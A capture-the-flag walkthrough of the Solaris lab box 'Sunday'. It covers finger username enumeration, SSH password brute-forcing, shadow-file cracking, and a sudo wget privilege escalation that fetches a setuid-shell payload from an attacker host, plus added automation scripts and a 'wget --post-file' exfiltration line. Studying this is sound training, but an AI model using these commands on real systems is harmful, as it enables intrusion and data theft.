Summary

Sunday is an easy Solaris box. The finger service on port 79 leaks valid usernames, and one of the two users it reveals, sunny, has a weak password that can be brute-forced over SSH to obtain a low-privileged shell. Enumerating the system turns up a readable backup of the shadow file; cracking it yields the password of the second user, sammy. Root is obtained by chaining both users' sudo permissions: sammy can run wget as root and use it to overwrite a file that sunny is allowed to execute as root.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.1.190

PORT    STATE SERVICE VERSION
79/tcp  open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

However, that scan only covers nmap's default top-1000 port list and is very slow against this host, so masscan was also used:

#masscan
open tcp 42273 10.129.88.74 1614514529
open tcp 22022 10.129.88.74 1614514552
open tcp 111 10.129.88.74 1614514604
open tcp 42302 10.129.88.74 1614514630
# end

It found additional open ports that were then investigated with nmap. The two high ports are typical of dynamically assigned RPC services behind rpcbind on port 111 (rpcinfo -p <host> lists what is registered there), while port 22022 turned out to be SSH:

PORT      STATE SERVICE VERSION
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)

Finger Enumeration

First, enumerate the finger service. A query for a single name tells you whether that login exists:

finger root@sunday.htb
Login       Name               TTY         Idle    When    Where
root     Super-User            pts/3         sunday

Because the response differs for existing and unknown logins, the service can be used to brute-force usernames. Here pentestmonkey's finger-user-enum.pl was used with the xato-net-10-million-usernames wordlist:

perl finger-user-enum.pl -U xato-net-10-million-usernames.txt -t 10.129.88.74

sammy@10.129.88.74: sammy                 console      10 18:25
sunny@10.129.88.74: sunny                 pts/3        24, 2018 

Among the standard system accounts it found two real users. Verify the results by hand:

finger sammy@10.129.105.246
Login       Name               TTY         Idle    When    Where
sammy    sammy                 console      10 18:25

finger sunny@10.129.105.246
Login       Name               TTY         Idle    When    Where
sunny    sunny                 pts/2         13 Mon 12:30  10.10.14.147   
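The user enumeration above is, at the protocol level, nothing more than opening TCP/79, sending the candidate name followed by CRLF and reading the answer. The following bash script is an added example, not code from the write-up or from finger-user-enum.pl; it speaks the finger protocol directly through bash's /dev/tcp and classifies each response. It assumes, as Solaris fingerd does, that an unknown login is answered with "???" in the Name column while a known login gets a line with its real name (for sammy and sunny the login repeated). The target address and wordlist path in the usage comment are the ones from the post, and the timeout command is assumed to be GNU coreutils.

```shell
#!/usr/bin/env bash
# Added example: minimal finger (RFC 1288) user enumerator in bash.
# Assumption: the server answers an unknown login with a "???" Name column
# (Solaris fingerd behaviour); a known login yields a line without it.

# Decide from a raw finger response on stdin whether user $1 exists.
# Exit status 0 = exists, 1 = unknown. Pure text parsing, runs offline.
finger_user_exists() {
    awk -v u="$1" '
        /^Login[[:space:]]+Name/ { next }          # skip the column header
        $1 == u && $0 !~ /\?\?\?/ { found = 1 }    # login line without ???
        END { exit found ? 0 : 1 }
    '
}

# Speak the protocol directly: connect to TCP/79, send "<user>\r\n" and
# read until the server closes. Uses bash's /dev/tcp, so no finger client
# is needed. A failed connection makes the redirection (and so the call) fail.
finger_query() {
    local host=$1 user=$2
    {
        printf '%s\r\n' "$user" >&3
        timeout 10 cat <&3       # bound the read in case the server stalls
    } 3<>"/dev/tcp/$host/79"
}

# Walk a username wordlist and print every login the server confirms.
finger_enum() {
    local host=$1 wordlist=$2 user
    while IFS= read -r user; do
        [ -n "$user" ] || continue
        if finger_query "$host" "$user" | finger_user_exists "$user"; then
            printf '%s\n' "$user"
        fi
    done < "$wordlist"
}

# Usage against the box (needs network access):
#   finger_enum 10.129.88.74 /usr/share/wordlists/xato-net-10-million-usernames.txt
```

Each candidate costs one TCP connection, which is why a ten-million-line wordlist takes a while; finger-user-enum.pl does the same thing with a worker pool. The header-skip in the parser matters only if someone puts "Login" in the wordlist.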

Brute-forcing SSH

With two usernames and an SSH service on 22022, the next step is a password brute-force. I used Hydra first, but it was very slow:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.129.105.135 ssh -s 22022

I then tried Medusa, which was also very slow, and finally patator:

patator ssh_login host=10.129.105.246 port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0 -x ignore:mesg='Authentication failed.'

Patator was the only tool that worked here, which shows that it is worth trying several tools that serve the same purpose when your usual one fails. The result:

sunny : sunday

Now authenticate with SSH. SunSSH 1.3 only offers SHA-1 based key exchange methods that current OpenSSH clients disable by default, so one of them has to be re-enabled explicitly:

ssh sunny@10.129.105.141 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1

On OpenSSH 8.8 and newer you will likely also need -oHostKeyAlgorithms=+ssh-rsa, because the server can only produce SHA-1 RSA host key signatures, which those clients also reject by default.

Exploitation

This gives an SSH shell as sunny. Note that the home directory lives under /export/home, which is the Solaris convention rather than /home:

sunny@sunday:~$ pwd
/export/home/sunny

Check what sunny is allowed to run with sudo:

sunny@sunday:/home$ sudo -l
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

sunny@sunday:/home$ ls -la /root/troll
ls: cannot access /root/troll: Permission denied

We can execute this file as root but cannot read it, so run it and see what it does:

sunny@sunday:/home$ sudo /root/troll
testing
uid=0(root) gid=0(root)

It seems to echo a string and then run id. Let's enumerate further. In / there is a directory named backup, which is not part of a default install and is therefore interesting. It contains a backup of the shadow file that sunny can read:

sunny@sunday:/backup$ ls
agent22.backup  shadow.backup

Copy it over with scp (the same key-exchange option is needed):

scp -oKexAlgorithms=+diffie-hellman-group1-sha1 -P 22022 sunny@10.129.105.141:/backup/shadow.backup shadow.backup

Now crack it with a password cracking tool; John the Ripper reads the shadow format directly:

john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup

It finds sammy's password:

cooldude!        (sammy)

Switch user from the SSH shell:

sunny@sunday:~$ su sammy
Password: 
sunny@sunday:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)

You now have access to user.txt.


Privilege Escalation

Check sammy's sudo permissions:

sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

So sammy can run wget as root. It is always worth going back over your enumeration to see whether findings can be chained: sammy can write arbitrary files as root with wget -O, and sunny can execute /root/troll as root. The path to root is therefore to overwrite /root/troll with a script of our own. Note that wget -O truncates and rewrites the existing file, so the executable bit root set on /root/troll is preserved. The following file was created on the attacking machine:

cat getroot 
#!/bin/bash
cp /bin/bash /tmp/pwned; chmod +s /tmp/pwned

In hindsight, a simpler payload that just spawns a shell would also have worked:

#!/bin/bash

bash

Run via sudo /root/troll, that drops you straight into a root shell.

Whichever payload you use, start two SSH sessions, one as sunny and one as sammy. Timing matters, because /root/troll is restored every few seconds. Serve the payload over HTTP from the attacking machine (for example with python3 -m http.server 80) and fetch it as sammy:

sudo wget -O /root/troll 10.10.14.147/getroot

Then, as sunny, execute:

sudo /root/troll

This will create a file named pwned in /tmp that you can use to get a root shell:

sunny@sunday:~/Desktop$ ls -la /tmp
total 742
drwxrwxrwt  4 root sys     446 2021-03-01 12:52 .
drwxr-xr-x 26 root root     27 2020-09-30 13:20 ..
[...]
-r-sr-sr-x  1 root root 735368 2021-03-01 12:52 pwned

To obtain the root shell, execute:

sunny@sunday:~/Desktop$ /tmp/pwned -p
pwned-3.2# id
uid=101(sammy) gid=10(staff) euid=0(root) egid=0(root) groups=10(staff)
pwned-3.2# cat /root/root.txt
fb40fab61d99d37536daeec0d97af9b8
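Because /root/troll is put back every few seconds, doing the two steps by hand in separate windows is fiddly. The script below is an added example, not the original write-up's tooling: it packages the payload generator used above together with a retry loop for each user, so that sammy's session keeps re-fetching the payload and sunny's session keeps triggering troll until the setuid shell shows up. It assumes the attacker's HTTP server on 10.10.14.147 (the address used in the post; override with ATTACKER_IP) is serving the payload as getroot, and that /tmp on the box honours setuid bits (it did, since /tmp/pwned -p worked). The function names are my own.

```shell
#!/usr/bin/env bash
# Added example: the troll/wget chain with retry loops to beat the job that
# restores /root/troll every few seconds. Assumes an HTTP server on
# ATTACKER_IP serving the payload at /getroot.
ATTACKER_IP=${ATTACKER_IP:-10.10.14.147}
TROLL=/root/troll
SUID_SHELL=/tmp/pwned

# Attacker side: write the payload that sammy's sudo wget will fetch.
# It copies bash and sets the setuid/setgid bits, as in the write-up.
write_payload() {
    local out=$1
    cat > "$out" <<'EOF'
#!/bin/bash
cp /bin/bash /tmp/pwned
chmod +s /tmp/pwned
EOF
    chmod +x "$out"
}

# Is $1 a setuid file owned by uid 0? (0 = yes). Uses ls -ln rather than
# GNU stat so it also works on the Solaris side.
suid_shell_ready() {
    [ -u "$1" ] && [ "$(ls -ln "$1" | awk '{print $3}')" = 0 ]
}

# On the box as sammy: keep overwriting troll (wget -O truncates the existing
# file, so root's executable bit survives) until the payload has run.
sammy_overwrite_loop() {
    until suid_shell_ready "$SUID_SHELL"; do
        sudo wget -q -O "$TROLL" "http://$ATTACKER_IP/getroot"
        sleep 1
    done
}

# On the box as sunny, in a second SSH session: keep running troll as root.
# Until sammy wins the race this just runs the original troll (prints
# "testing" and the id line); afterwards it creates the setuid shell.
# bash -p keeps the effective uid instead of dropping it to the real uid.
sunny_trigger_loop() {
    until suid_shell_ready "$SUID_SHELL"; do
        sudo "$TROLL" >/dev/null 2>&1
        sleep 1
    done
    exec "$SUID_SHELL" -p
}

# Usage:
#   attacker:  write_payload getroot && python3 -m http.server 80
#   box/sammy: sammy_overwrite_loop
#   box/sunny: sunny_trigger_loop
```

The two loops poll the same condition, so either side can be started first; once /tmp/pwned exists as a setuid root file, sammy's loop stops rewriting troll and sunny's loop hands over to the root shell.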

As a side note, wget itself can be abused to read the root flag directly. With -i it treats each line of the given file as a URL to fetch and, when the line is not a valid URL, prints it in the error message:

sudo wget -i /root/root.txt

Similarly, sudo wget --post-file=/root/root.txt http://10.10.14.147/ sends the file's contents in an HTTP POST body to a listener on your machine, which works for any file root can read.

Conclusion

This was an easy box but I found it to be pretty useful; I liked the privilege escalation due to having to combine several things to obtain the final root. What I disliked was that the box froze every couple of seconds, not sure why, but it made it take a lot longer. Hope you didn't have this issue and enjoyed the writeup!